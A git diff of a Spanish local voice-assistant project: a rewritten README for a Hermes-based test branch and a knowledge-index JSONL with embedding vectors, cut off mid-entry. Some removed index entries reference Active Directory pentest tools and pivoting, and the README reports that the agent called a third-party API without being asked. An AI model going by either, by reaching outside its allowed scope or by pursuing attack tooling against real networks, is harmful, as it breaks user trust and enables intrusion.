diff --git a/README.md b/README.md index 2cd4ebf..84e5626 100644 --- a/README.md +++ b/README.md @@ -1,184 +1,75 @@ -# JARVIS +# JARVIS-VERDE 🟒 -Asistente de voz **100 % local** para Linux. Ni el micrΓ³fono, ni las -conversaciones, ni el modelo salen de la mΓ‘quina. Sin cuentas, sin claves, sin -nube. NΓΊcleo propio, en castellano, que corre en **cualquier Linux** β€”de un -portΓ‘til modesto a una torreβ€” y aprovecha la GPU si la hay, o la CPU si no. +Banco de pruebas de JARVIS montado sobre **[Hermes Agent](https://github.com/NousResearch/hermes-agent)** (Nous Research, MIT): un arnΓ©s agΓ©ntico completo, **100 % local por configuraciΓ³n**. Esta rama documenta el carril verde; el `master` es el nΓΊcleo naranja. -![Linux](https://img.shields.io/badge/Linux-cualquier%20distro-FCC624?logo=linux&logoColor=black) -![Python](https://img.shields.io/badge/Python-3.10%2B-3776AB?logo=python&logoColor=white) -![Ollama](https://img.shields.io/badge/Ollama-qwen3.5%3A4b-000000?logo=ollama&logoColor=white) -![GPU](https://img.shields.io/badge/GPU-opcional%20(NVIDIA%2FAMD%2FCPU)-76B900) -![whisper.cpp](https://img.shields.io/badge/whisper.cpp-STT-555555) -![Piper](https://img.shields.io/badge/Piper-TTS-555555) -![License](https://img.shields.io/badge/licencia-GPL--3.0-blue) +![Arquitectura del carril verde](verde/docs/arquitectura.svg) -![Arquitectura de JARVIS](docs/stack.svg) +## Para quΓ© sirve -![El panel de JARVIS](docs/panel.png) +JARVIS tiene tres carriles: **cian** (Newelle, congelado), **naranja** (el nΓΊcleo propio) y **verde** (este). El verde responde a una pregunta: *ΒΏun arnΓ©s agΓ©ntico de fΓ‘brica aporta algo que el nΓΊcleo naranja no tenga?* En concreto, las tres cosas que al naranja le faltan y que Hermes trae de serie: -*El panel: telemetrΓ­a del sistema, el reactor, lo que oye y hace, el catΓ‘logo de -acciones, y las mΓ©tricas de rendimiento del propio asistente. Hay un -[vΓ­deo de ejemplo](docs/demo.webm) (47 s) en `docs/`.* +- **Skills que el agente se crea y mejora solo.** +- **Canales de mensajerΓ­a** (Telegram, Discord, Signal, WhatsApp, Slack). +- **Memoria** de largo plazo entre sesiones. + +No es el asistente de diario β€”para eso estΓ‘ el naranja, que es mΓ‘s rΓ‘pidoβ€”; es el laboratorio para decidir quΓ© ideas de Hermes merece la pena llevar al nΓΊcleo. + +## El panel + +Hermes no es un chatbot: es una plataforma. El panel web (`verde/panel-verde.sh`, en `127.0.0.1:9119`) da chat, sesiones, ficheros, modelos, logs, cron, skills, MCP, canales y webhooks. + +![Panel β€” chat](verde/docs/panel-chat.png) + +**82 skills** en 14 categorΓ­as, entre ellas la integraciΓ³n con el RAG del naranja: + +![Panel β€” skills](verde/docs/panel-skills.png) ## El stack -| Capa | Pieza | Papel | -|---|---|---| -| OΓ­r | whisper.cpp | STT en castellano (GPU si hay, si no CPU) | -| Pensar | Ollama Β· `qwen3.5:4b` | el cerebro, con tool-calling | -| Saber | model2vec + bΓΊsqueda hΓ­brida | RAG sobre los apuntes del usuario | -| Hablar | Piper (o voz clonada con XTTS) | TTS local | -| Cara | panel web Β· WebSocket Β· Canvas | el HUD, con el reactor y las mΓ©tricas | -| Manos | catΓ‘logo de acciones + shell | lo que ejecuta en la mΓ‘quina | +| Capa | Pieza | Licencia | ΒΏSale algo de la mΓ‘quina? | +|---|---|---|---| +| ArnΓ©s | Hermes Agent | MIT | por configuraciΓ³n, no | +| Cerebro | Ollama Β· `qwen3.5:4b-verde` (64k ctx) | Apache-2.0 | **no** β€” `127.0.0.1:11434` | +| OΓ­r | faster-whisper `small` (local, CPU) | MIT | **no** | +| Hablar | Piper Β· `davefx` (misma voz que el naranja) | MIT | **no** | +| Saber | RAG del naranja vΓ­a `busca_cli` | β€” | **no** | -Todo corre en `127.0.0.1`. No hay ninguna llamada a la nube en el uso normal; lo -ΓΊnico que puede salir es una bΓΊsqueda web si el modelo decide usarla, y se avisa. +## La integraciΓ³n con el RAG -## Portabilidad +El agente consulta el **mismo Γ­ndice que el nΓΊcleo naranja** (~19.500 entradas: metodologΓ­a de pentesting, man pages, catΓ‘logo de herramientas y software, apps instaladas). Se hace con la skill local `buscar-en-apuntes` (en `verde/skills/`), que el agente activa cuando le preguntas por herramientas, comandos o "quΓ© dicen mis apuntes sobre X", y responde citando la fuente en vez de inventar. Motor: `nucleo/saber/busca_cli.py`. -DiseΓ±ado para correr en **cualquier Linux**, no en un equipo concreto: +## La voz, y en local -| | | -|---|---| -| Distro | cualquiera. `install.sh` detecta apt / dnf / pacman / zypper | -| GPU | **opcional**. Ollama reparte el modelo entre GPU y CPU solo: va con NVIDIA (CUDA), AMD (ROCm) o **solo CPU**. NingΓΊn parΓ‘metro estΓ‘ atado a una tarjeta | -| Escritorio | GNOME, KDE, lo que sea. Las acciones de **ventanas** necesitan X11 + `xdotool`; en Wayland esas Γ³rdenes se desactivan solas y el resto funciona igual | -| Audio | PipeWire, PulseAudio o ALSA. El micro prueba `pw-record`, `parec` y `arecord`, la primera que haya; la voz prueba `paplay`, `pw-play` y `aplay` | -| whisper | el binario se toma del build local o del `PATH`. Los modelos se buscan solos, o los fijas con `JARVIS_WHISPER_MODELOS=/ruta` | +El TUI de Hermes no trae micrΓ³fono y su STT nativo es para notas de voz de mensajerΓ­a (que saldrΓ­an de la mΓ‘quina). El carril lo puentea en local: -**Requisito real:** que quepa el modelo. `qwen3.5:4b` va cΓ³modo desde ~4 GB de -VRAM; con menos, usa un modelo mΓ‘s pequeΓ±o (`qwen3.5:2b`) o tira de CPU (hay RAM -de sobra). whisper.cpp se compila para tu plataforma β€”CUDA, ROCm, Metal o CPUβ€”; -la guΓ­a estΓ‘ en [`config/README_whisper_gpu.md`](config/README_whisper_gpu.md). +- **Escucha** β€” `verde/escucha-verde.sh` (pulsar-para-hablar): graba β†’ `faster-whisper` en CPU β†’ se lo pasa al agente. Prueba: `verde/pruebas/08_escucha.sh`. +- **Habla** β€” `verde/voz-verde.sh`: el mismo Piper y la misma voz que el naranja. Prueba: `verde/pruebas/07_voz.sh`. -### Ajuste en tarjetas pequeΓ±as (4 GB) - -Solo si vas MUY justo de VRAM y el cerebro y whisper se pelean por ella: fijar -`num_gpu 24` en el `Modelfile` reserva sitio a whisper. EstΓ‘ explicado en los -comentarios del propio `Modelfile`. En una torre con una tarjeta normal **no -hace falta tocar nada**. - -## InstalaciΓ³n - -Necesita, en la mΓ‘quina: [Ollama](https://ollama.com), whisper.cpp (compilado -para tu plataforma, ver [`config/README_whisper_gpu.md`](config/README_whisper_gpu.md)) -y [Piper](https://github.com/rhasspy/piper). +## Arranque ```bash -git clone https://gitea.laenre.net/hacklab/JARVIS.git -cd JARVIS -./install.sh # comprueba servicios, crea el venv y el modelo de Ollama +# 1. Instalar Hermes Agent (ver su repo) y el modelo del verde +ollama create qwen3.5:4b-verde -f verde/qwen3.5-4b-verde.Modelfile + +# 2. Medir, configurar y dictaminar (encuentra el techo de contexto en tu GPU) +./verde/arrancar.sh + +# 3. El panel web, o el TUI en verde +./verde/panel-verde.sh # dashboard en 127.0.0.1:9119 +./verde/verde-launcher.sh # TUI + +# 4. Las pruebas (ninguna abre el TUI) +./verde/pruebas/ejecutar.sh ``` -`install.sh` no descarga modelos pesados ni toca el sistema sin avisar: solo -prepara el entorno de Python y crea `qwen3.5:4b-jarvis` a partir del `Modelfile`. +## El aviso que importa -DespuΓ©s: +**Local por configuraciΓ³n, no por construcciΓ³n.** El agente tiene terminal y web, y **decide por su cuenta**: en una prueba, pidiΓ©ndole un cartel ASCII, se fue a una API de terceros porque una librerΓ­a no estaba instalada. Cerebro, voz, oΓ­do y memoria son locales y comprobados; lo que no estΓ‘ garantizado es **lo que el agente haga con la terminal que le has dado**. EstΓ‘ todo en `verde/NOTAS.md`. -```bash -./nucleo/saber/indexa.py # (opcional) indexa tus apuntes para el RAG -./nucleo/arranca.sh # el asistente y el panel, en 127.0.0.1 -``` +## El precio -El RAG funciona nada mΓ‘s clonar: el repo trae un Γ­ndice pΓΊblico pre-construido, asΓ­ -que no hace falta indexar para que sepa de metodologΓ­a, comandos y herramientas. +Hermes exige β‰₯64k de contexto, lo que obliga a bajar media red del 4B a la CPU: el precio es el **tiempo de respuesta** (minutos por turno en frΓ­o). Es el dato que decide si el carril compensa frente al naranja. Medido y anotado en `verde/NOTAS.md`. -### Comprobar el RAG +--- -Si la bΓΊsqueda de conocimiento no responde bien, este diagnΓ³stico revisa la cadena -entera y marca en verde/rojo cada eslabΓ³n β€”dependencias, Γ­ndice, embedder, -bΓΊsqueda y Ollamaβ€” con una lΓ­nea de quΓ© hacer si algo falla: - -```bash -./probar_rag.sh # comprobaciones rΓ‘pidas -./probar_rag.sh --eval # ademΓ‘s mide la calidad de recuperaciΓ³n (hit@k) -./probar_rag.sh --verboso # enseΓ±a el primer resultado de cada bΓΊsqueda -``` - -No necesita nada arrancado y sale con cΓ³digo distinto de cero si hay algΓΊn fallo -duro, asΓ­ que sirve tambiΓ©n para CI. - -## QuΓ© le puedes pedir - -Habla en castellano, natural. **150 acciones** en el catΓ‘logo, agrupadas: - -| Grupo | NΒΊ | Ejemplos | -|---|---|---| -| sistema | 59 | "cuΓ‘nto espacio queda", "la memoria", "la carga de CPU", "la temperatura" | -| firefox | 54 | "abre el Gmail", "abre YouTube", "abre el GitHub", "abre Maps" | -| ventanas | 12 | "manda la ventana a la izquierda", "maximiza", "centra la ventana" | -| ficheros | 11 | "busca un fichero llamado…", "lee el fichero…", "cuΓ‘nto ocupa la carpeta…" | -| pentest | 8 | "escanea la red", "los puertos del host…", "resuelve el dominio…", "el whois de…" | -| oasis | 6 | "estΓ‘ corriendo Oasis", "cuΓ‘ntas conexiones tiene" | - -Si lo que pides no estΓ‘ en el catΓ‘logo, el modelo lo resuelve con un **comando de -shell** (de solo lectura por defecto). Y si pregunta *cΓ³mo* se hace algo tΓ©cnico, -puede **buscar en tus apuntes** (RAG) antes de responder. - -El RAG es lo que hace que el asistente dΓ© el comando que **tΓΊ ya has probado** en -vez de inventarse los flags. Y no es un adorno: medido sobre un conjunto de -preguntas de pentesting, la recuperaciΓ³n sube de **hit@1 48 % β†’ 82 %** y -**hit@5 77 % β†’ 95 %**. El mΓ©todo, el pipeline y esos nΓΊmeros estΓ‘n en -[docs/rag.md](docs/rag.md). - -Y **JARVIS elige su propio cerebro**: si una pregunta es mΓ‘s dura de lo normal -puede cambiar a un modelo mΓ‘s potente (`elegir_modelo`), y volver al rΓ‘pido para -lo simple. Dile "usa un modelo mΓ‘s potente" o fija uno con `JARVIS_MODELO`. - -## Γ“rdenes con root β€” importante - -Algunas Γ³rdenes que gestionan el sistema (instalar un paquete, reiniciar un -servicio, montar un disco) necesitan `sudo`. Conviene saber cΓ³mo se maneja, -porque es donde un asistente de voz puede hacer daΓ±o: - -- **No pide la contraseΓ±a al arrancar.** Molestar de entrada echa para atrΓ‘s, y - la mayorΓ­a de lo que se le pide no necesita root. Arranca y funciona sin nada. -- **Se pide solo cuando hace falta, y una vez.** La primera vez que una orden - necesita `sudo`, aparece un diΓ‘logo pidiendo tu contraseΓ±a. La tecleas, la - repites, y a partir de ahΓ­ el permiso queda abierto para la sesiΓ³n. -- **Caduca a los 15 minutos** de inactividad, y al cerrar el panel. No es un - "root para siempre". -- La contraseΓ±a **nunca se escribe en disco**: vive solo en la memoria del - proceso mientras dura la sesiΓ³n, y se pasa a `sudo -S` por la entrada estΓ‘ndar. -- **La voz no puede autoaprobar root.** El permiso de sesiΓ³n ahorra re-teclear - la contraseΓ±a, nunca salta el pedirla la primera vez. - -Si prefieres el modo seguro (bloquear el panel y pedir la contraseΓ±a al abrir, -para que nadie que pase por delante dΓ© Γ³rdenes), arranca con `--candado`. - -## Privacidad - -Es la premisa, y se verifica. Ver [PRIVACIDAD.md](PRIVACIDAD.md). Este -repositorio **no incluye** los apuntes indexados ni el diario de conversaciΓ³n: -son del usuario, y el `.gitignore` los bloquea. - -## Estructura - -``` -nucleo/ el asistente (oido, cerebro, boca, manos, cara, saber) -config/ configuraciΓ³n: modelo, voz, whisper -voz/ clonado de voz con XTTS y cachΓ© de frases -entrena/ fine-tuning con QLoRA -install.sh el instalador -``` - -## Estado y limitaciones - -Proyecto en desarrollo. En el radar: acabar de generalizar los scripts de `voz/` -(algunos aΓΊn asumen la disposiciΓ³n del autor), las acciones de ventanas sobre -**Wayland** (hoy solo X11), y el fine-tuning de `entrena/`, pendiente de un -ajuste para modelos multimodales. - -## Contribuir - -Se agradecen los commits: es software libre y hay mucho por hacer. Las ideas -acotadas estΓ‘n en [ROADMAP.md](ROADMAP.md) (mΓ‘s gestores de ventanas, mΓ‘s -acciones, probar otros modelos, el RAG...) y cΓ³mo empezar en -[CONTRIBUTING.md](CONTRIBUTING.md). No hay que compilar nada: es Python, bash y -una pΓ‘gina web. - -## Licencia - -[GPL-3.0](LICENSE). Software libre y copyleft: si lo modificas y lo distribuyes, -el resultado sigue siendo libre. +Software libre. Ver `verde/README.md`, `verde/NOTAS.md` y `verde/ESCALERA.md` para el detalle. diff --git a/nucleo/datos/saber-publico.jsonl b/nucleo/datos/saber-publico.jsonl index 95d909e..a107d23 100644 --- a/nucleo/datos/saber-publico.jsonl +++ b/nucleo/datos/saber-publico.jsonl @@ -697,1839 +697,1859 @@ {"tipo": "catalogo", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "tema": "miscellaneous", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Credit Modeling β€” Methods for classifying credit applicants into risk classes. Ansible β€” A Python-based, open-source IT configuration management and automation platform. Biological Visualizations β€” Interactive visualization of biological data on the web. QR Code β€” A type of matrix barcode that can be used to store and share a small amount of information. Veganism β€” Making the plant-based lifestyle easy and accessible. Translations β€” The transfer of the meaning of a text from one language to another. Scriptable β€” An iOS app for automation in JavaScript. WebXR β€” Enables immersive virtual reality and augmented reality content on the web. Computational Geometry β€” Computational approaches for problems in geometry. OpenStreetMap β€” An open data mapping project utilized by many apps and devices. Computational Biology β€” Computational approaches applied to problems in biology. Read the Docs β€” Example documentation projects to inspire and help bootstrap new documentation projects.", "v": [-0.01519, 0.05455, -0.0715, -0.37572, 0.04325, -0.2344, -0.06757, 0.03914, -0.09009, -0.0205, -0.08167, -0.25757, -0.0557, 0.07165, 0.0646, -0.02785, 0.08305, -0.17855, -0.00597, -0.05826, 0.01632, -0.04483, -0.18735, -0.0458, 0.02994, 0.0993, -0.09526, 0.01136, -0.07871, 0.04475, -0.03234, 0.00729, 0.09008, -0.04026, -0.20612, -0.11165, -0.09551, -0.00394, -0.05358, 0.01359, -0.02626, 0.02146, -0.02274, 0.10731, 0.04384, -0.01266, 0.04931, 0.02054, -0.10998, -0.05141, -0.09086, -0.0487, -0.15872, 0.0861, 0.04094, 0.02904, 0.13797, -0.16923, 0.0416, -0.01679, -0.03463, 0.04237, -0.06825, -0.08932, -0.01339, -0.01338, 0.03014, 0.07538, -0.10587, 0.05993, -0.02219, 0.01498, -0.02784, 0.02509, 0.03098, -0.04302, -0.03819, -0.02822, 0.05074, 0.05355, 0.00959, -0.01129, -0.12846, 0.00185, -0.06704, -0.06315, -0.00733, -0.03232, 0.06552, -0.10411, -0.00838, -0.00534, 0.02038, 0.01294, 0.05317, -0.00329, 0.01204, 0.00042, -0.02632, 0.01157, -0.07299, -0.02376, -0.07411, 0.03024, -0.01156, 0.09274, 0.0681, -0.00342, -0.05806, -0.022, 0.08815, -0.00531, -0.04508, 0.00392, -0.05708, 0.00079, 0.07791, 0.08819, 0.01763, -0.07495, -0.00834, -0.012, 0.03734, -0.03014, 0.0266, 0.02206, -0.00956, 0.16406, 0.01715, -0.01252, -0.00938, -0.0529, -0.09215, 0.02107, -0.03321, 0.00671, 0.08609, -0.03938, 0.02995, -0.02215, -0.0531, 0.02055, -0.02073, 0.01497, -0.03206, -0.01515, 0.03426, -0.00619, -0.04052, 0.01924, -0.02623, 0.02169, -0.04141, 0.02755, -0.13252, -0.05546, -0.02641, 0.01229, -0.08926, -0.0256, -0.01093, 0.02349, 0.01625, -0.02273, -0.00441, -0.00775, 0.00724, -0.00819, 0.04901, 0.05703, -0.01217, 0.05685, -0.00704, -0.04795, 0.02485, -0.04278, 0.04477, -0.03404, 0.00412, -0.06344, -0.05245, -0.06105, 0.04397, -0.01241, 0.02928, -0.00726, -0.00686, -0.0204, -0.01594, -0.01753, -0.05126, 0.06937, -0.00578, -0.02969, 0.05303, -0.03903, -0.00688, 0.03132, 0.01149, -0.01237, -0.00632, 0.04959, 0.00565, -0.01629, 0.02815, 0.12478, 0.00691, 0.01876, -0.05904, -0.0, -0.04781, -0.04167, 0.02364, 0.01769, 0.01589, -0.02645, -0.00552, 0.0519, 0.01738, -0.04961, -0.01054, 0.01844, 0.01233, -0.00848, 0.0108, 0.00555, 0.05922, 0.04438, 0.0014, -0.04944, 0.02839, -0.04806, -0.00285, 0.00924, 0.0102, 0.01198, -0.01524, 0.01895, -0.03444, -0.03923, -0.00245, 0.06061, 0.01725, -0.04268, -0.03738, -0.05381, -0.05979, -0.01236, 0.00676, -0.03451, -0.05132, -0.01396, -0.00663, -0.07035, -0.0368, 0.02185]} {"tipo": "catalogo", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "tema": "miscellaneous", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Quarto β€” Scientific and technical open-source publishing system built on Pandoc. Biological Image Analysis β€” Interpreting biological phenomena using images. ChatGPT β€” Artificial intelligence chatbot developed by OpenAI. Whisper β€” Open-source AI-powered speech recognition system developed by OpenAI. Stock Trading β€” Purchase and sale of equities of publicly traded companies to generate profits. Steam Deck β€” A handheld gaming computer developed by Valve. Astrophotography β€” Photography of astronomical objects, celestial events, or areas of the night sky. HPC β€” High Performance Computing. Geocaching β€” Outdoor treasure-hunting activity that uses GPS-enabled devices. Regex β€” Specialized language for matching patterns in text. Event-Driven Architecture β€” A software architecture approach where services collaborate by publishing and subscribing to events. Permacomputing β€” Resilient and regenerative computing practices inspired by permaculture.", "v": [0.07587, -0.02888, -0.01618, -0.44419, -0.00037, -0.17981, -0.06552, -0.04343, -0.01334, 0.0183, -0.09474, -0.10187, -0.17575, 0.09221, 0.09898, -0.0455, 0.05013, -0.10961, 0.0172, 0.01484, -0.06112, 0.06935, -0.11441, -0.11153, 0.16106, -0.01482, -0.03476, -0.00658, -0.09334, 0.09067, -0.00461, 0.03537, 0.04197, -0.09377, -0.20984, -0.15481, -0.0639, -0.07474, -0.00115, 0.06397, -0.0959, -0.06359, -0.00472, 0.05663, 0.17521, 0.02198, 0.0037, -0.05537, -0.06781, -0.04384, -0.08198, -0.01096, -0.14142, 0.05311, 0.15772, 0.01825, 0.03298, -0.00351, -0.03816, -0.11577, -0.0314, 0.09249, -0.03395, -0.16643, -0.00469, 0.01648, -0.08531, 0.0273, -0.03528, 0.04231, 0.04173, -0.06371, 0.07486, 0.02971, 0.06903, 0.00451, -0.02534, -0.00366, 0.00438, 0.01218, -0.13667, -0.02496, -0.05323, 0.00153, -0.01607, -0.01288, 0.05241, -0.01593, 0.01725, -0.01773, -0.03596, -0.03867, 0.02345, 0.0718, 0.05392, -0.03322, -0.0348, -0.02107, -0.05882, 0.09287, -0.02759, -0.03717, -0.05228, 0.01539, -0.03151, 1e-05, 0.04463, -0.04461, -0.05574, -0.01372, 0.04056, -0.00183, -0.02192, -0.00403, -0.05564, -0.02079, 0.07119, 0.0167, 0.0862, 0.04237, -0.03555, -0.08042, 0.03292, -0.02332, -0.01323, -0.04067, -0.05628, 0.11661, 0.01614, -0.03459, 0.01569, -0.03557, 0.01044, 0.04297, -0.00256, 0.03002, 0.10176, 0.02275, 0.025, -0.01445, 0.01706, 0.03971, -0.01674, 0.00446, 0.02882, 0.00404, -0.00138, -0.02793, -0.02387, -0.00185, 0.00435, 0.01913, -0.05315, -0.0063, -0.1092, -0.05867, -0.02392, 0.00079, -0.08335, -0.00104, -0.03888, 0.10055, 0.0174, 0.02495, -0.02326, -0.01471, 0.03531, -0.07564, 0.00441, 0.02779, -0.04851, 0.03592, -0.00938, -0.08362, 0.0146, 0.00409, 0.05658, -0.00697, 0.00645, -0.07888, -0.0254, -0.06282, 0.06808, 0.00451, 0.0498, 0.0291, 0.00116, -0.02782, -0.01746, -0.03737, -0.00027, -0.01, 0.03783, -0.04816, 0.04772, -0.09498, -0.05579, -0.00649, 0.02674, 0.00339, -0.01108, 0.0372, 0.00304, 0.00701, 0.00409, 0.03116, 0.05991, 0.04805, -0.03153, 0.02088, -0.00761, -0.04658, 0.04794, 0.04818, -0.02683, 0.02354, 0.00806, 0.00058, -0.04619, -0.04539, -0.01973, 0.02509, 0.0802, 0.00135, 0.03117, -0.02118, 0.05588, 0.03236, 0.05492, -0.05753, 0.03404, -0.00933, -0.00101, 0.02431, -0.0092, 0.02751, -0.00887, 0.00241, -0.00554, -0.02806, 0.01392, -0.00459, -0.00419, -0.03275, -0.03663, -0.06644, -0.06471, -0.01477, 0.0227, -0.04015, -0.03689, -3e-05, 0.00989, -0.0739, 0.00052, -0.00688]} {"tipo": "catalogo", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "tema": "miscellaneous", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Standards β€” Proposals and standards that define and enhance software, languages, and related technologies. Claude Code β€” Terminal-based AI coding assistant by Anthropic. Gemini CLI β€” Terminal-based AI coding assistant by Google. SAP Commerce β€” An e-commerce platform built with Java, Spring MVC, and Angular. Tech Ethics β€” Mitigating and avoiding the potential negative effects of technology on society. Copilot Agents β€” AI pair programming assistant by GitHub that provides code suggestions and completions.", "v": [-0.13497, -0.00919, 0.02011, -0.32622, -0.00074, -0.23592, 0.01154, 0.0348, -0.12365, 0.098, -0.09893, -0.15333, -0.09721, 0.04324, 0.13596, -0.07291, 0.13052, -0.22038, 0.06763, 0.07038, 0.03915, 0.05473, -0.13074, -0.12847, 0.15798, 0.08265, -0.01722, 0.01515, -0.10799, 0.03399, -0.0293, -0.07038, 0.10259, -0.04433, -0.20663, -0.09566, -0.0151, 0.03108, -0.04653, 0.11638, -0.03601, -0.03432, -0.00482, -0.06882, 0.08616, -0.04616, 0.12028, -0.01303, 0.00872, 0.02024, -0.09886, 0.03009, -0.13045, 0.05111, 0.13217, 0.07413, 0.08932, -0.01704, -0.0468, -0.05245, -0.00417, 0.05202, -0.06063, -0.02078, 0.01785, 0.08286, 0.04168, 0.01307, -0.0742, 0.06229, 0.02137, 0.04421, -0.08756, -0.1261, 0.06091, 0.01462, -0.05132, -0.02274, 0.08731, 0.00946, -0.03875, 0.01045, -0.02361, -0.01186, 0.01312, -0.07147, -0.04792, -0.04392, 0.02931, -0.04723, 0.0234, 0.02485, 0.01343, -0.01282, 0.05696, 0.03075, 0.03328, -0.00189, 0.02579, 0.02221, -0.0196, -0.08753, -0.03898, 0.07984, -0.00957, 0.0348, 0.1004, -0.043, -0.01391, -0.02575, 0.02834, -0.02977, 0.02054, -0.04762, -0.00507, -0.0732, 0.10468, -0.00921, 0.04449, -0.01881, -0.00243, 0.00491, -0.02575, -0.051, 0.03926, 0.06925, -0.00669, 0.10549, 0.05059, -0.04209, -0.05938, -0.08038, -0.05115, 0.04732, 0.00782, 0.07877, 0.10536, -0.02447, 0.01803, 0.0269, -0.03921, 0.04342, -0.01289, 0.05763, 0.0421, 0.0165, 0.01446, -0.04387, -0.02172, -0.00444, 0.01539, 0.04493, -0.07138, -0.01429, -0.14342, -0.06013, -0.03433, 0.02939, -0.10255, 0.02174, 0.01672, 0.03518, -0.00785, 0.00213, -0.01597, 0.0287, 0.04356, -0.03286, 0.03179, 0.01088, -0.01813, 0.02602, 0.04853, -0.08362, 0.01378, 0.00883, 0.05134, 0.03989, -0.04821, -0.07632, -0.08936, -0.00701, 0.03192, 0.01244, 0.03387, -0.07182, -0.00807, -0.01402, 0.00354, -0.03562, -0.04058, 0.01537, 0.01713, -0.01018, 0.01443, -0.00046, -0.08564, -0.01154, 0.00684, -0.02514, -0.0162, 0.08378, -0.01781, -0.02838, -0.02774, 0.06128, 0.02884, -0.04731, -0.00453, 0.01051, -0.02848, -0.05072, -0.02877, 0.04648, -0.0159, -0.00837, -0.02396, 0.03111, 0.02084, -0.04602, -0.02431, 0.00862, -0.00567, 0.00901, 0.02707, 0.01145, 0.05298, 0.03888, 0.01095, -0.05195, 0.03105, -0.04042, -0.01388, -0.01647, -0.01109, 0.01739, -0.05929, 0.00559, -0.02972, -0.04544, -0.02543, 0.00877, 0.00495, -0.04315, -0.02429, -0.02834, -0.0653, -0.03114, -0.01145, -0.00064, -0.061, 0.0189, 0.01571, -0.06997, -0.03894, -0.0039]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Apuntes Active Directory Pentest\n\nMimikatz Β· Impacket Β· Kerberos Β· BloodHound Β· Pivoting\n\n---", "indexar": "que herramienta sirve para realizar pruebas de penetraciΓ³n en dominios Active Directory?", "v": [0.10304, 0.03586, -0.16871, -0.23683, 0.08605, -0.03931, 0.00063, -0.02722, -0.05766, 0.0328, 0.03512, -0.06396, -0.07616, -0.21755, 0.02158, -0.00661, 0.18768, -0.1267, -0.14446, -0.03615, -0.03307, 0.00066, -0.11585, 0.0084, 0.05277, 0.04745, -0.04642, -0.06246, -0.06608, 0.0616, 0.0085, -0.02816, 0.07392, -0.04282, -0.02325, -0.18754, -0.09848, 0.05154, 0.13119, 0.14065, -0.0105, 0.02784, -0.13184, 0.04988, 0.00176, 0.06296, -0.00541, -0.0916, -0.01915, 0.00496, -0.03364, -0.06117, -0.1017, -0.04047, 0.01569, -0.10115, 0.1281, -0.10485, -0.01661, -0.13878, -0.09877, -0.11558, -0.01998, -0.03819, -0.02534, -0.11433, 0.08209, -0.02096, -0.05772, 0.08846, 0.03326, 0.05309, 0.06773, 0.02817, -0.05492, -0.08439, 0.10218, -0.02134, -0.03441, -0.00329, 0.12401, 0.00576, -0.06247, -0.00825, -0.12859, -0.16681, -0.03502, -0.1029, 0.05755, -0.08676, 0.05613, 0.09669, -0.06081, 0.04654, 0.0202, 0.01441, 0.08163, -0.03036, 0.04705, -0.04573, 0.14884, 0.04207, -0.08595, 0.10566, 0.0344, 0.06438, -0.06243, 0.00533, -0.06231, -0.00617, 0.0508, -0.03465, -0.04008, -0.10405, -0.02687, 0.16958, -0.08121, -0.08606, -0.02247, -0.02649, -0.06027, -0.03117, -0.02592, 0.00455, -0.07163, -0.04095, 0.00342, -0.04062, -0.03444, -0.03856, 0.10386, 0.03639, -0.04652, 0.03174, -0.02131, -0.00337, 0.02462, -0.04332, -0.01336, -0.07522, -0.01824, 0.01415, -0.02708, -0.04369, 0.00683, 0.03686, 0.02894, -0.00409, -0.03016, 0.01187, -0.05467, -0.06348, -0.0663, 0.08707, 0.01586, 0.01083, -0.03032, 7e-05, -0.07182, 0.05805, -0.03809, -0.02986, -0.01098, 0.01114, 0.01254, 0.00137, -0.02865, -0.05985, 0.05201, 0.07747, -0.00779, 0.06733, 0.00265, -0.05592, 0.00705, 0.02167, -0.01957, 0.01479, 0.0059, -0.06116, 0.00088, -0.02564, -0.06789, 0.00385, 0.04065, 0.03481, 0.03184, -0.05244, 0.00862, 0.02609, 0.0535, 0.04244, -0.02788, -0.01404, 0.0223, -0.02061, -0.00035, -0.0234, -0.0249, -0.05961, -0.01543, -0.02577, 0.01091, -0.05414, -0.00818, 0.04348, -0.01323, 0.01728, 0.03239, -0.03493, -0.07082, 0.00873, 0.04153, -0.01916, -0.06621, -0.01173, 0.01232, 0.03611, -0.0997, -0.01186, -0.0295, 0.0078, 0.00947, -0.03057, 0.0035, 0.08586, 0.01491, -0.02371, 0.02575, 0.00476, 0.03184, -0.02819, 0.00849, -0.01863, 0.05116, -0.04456, 0.00733, -0.00413, -0.03602, -0.02845, -0.04607, 0.03263, 0.03593, 0.02399, -0.05723, -0.05755, -0.00459, -0.03515, -0.01501, -0.05828, -0.00728, -0.00339, 0.01026, -0.05384, 0.00092, -0.01655]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Apuntes Active Directory Pentest\n\nMimikatz Β· Impacket Β· Kerberos Β· BloodHound Β· Pivoting\n\n---", "indexar": "con que puedo montar un ataque de pivoteo desde dentro del red?", "v": [-0.0031, 0.01927, -0.26731, -0.05912, -0.06323, 0.05572, -0.0008, 0.04011, -0.11169, -0.0911, 0.0673, -0.06159, 0.06217, -0.04684, 0.10186, -0.00139, -0.03482, 0.05045, 0.08651, -0.09851, -0.0471, -0.03954, 0.07144, 0.0141, 0.0972, 0.25171, 0.05153, 0.1693, -0.11355, 0.02417, 0.01506, 0.05371, 0.01254, -0.00432, 0.0465, -0.13241, 0.0817, 0.12028, 0.10028, 0.09227, -0.11858, -0.04321, -0.12452, 0.00706, 0.07295, -0.07889, -0.00977, -0.03186, 0.03891, 0.03531, 0.13744, 0.05386, -0.14194, -0.13077, -0.04579, -0.06024, 0.09986, -0.05101, 0.05149, -0.09082, -0.02239, 0.10466, -0.0369, -0.00886, -0.02857, -0.04326, -0.0816, -0.00839, -0.10272, 0.00688, -0.01386, -0.02325, -0.05765, 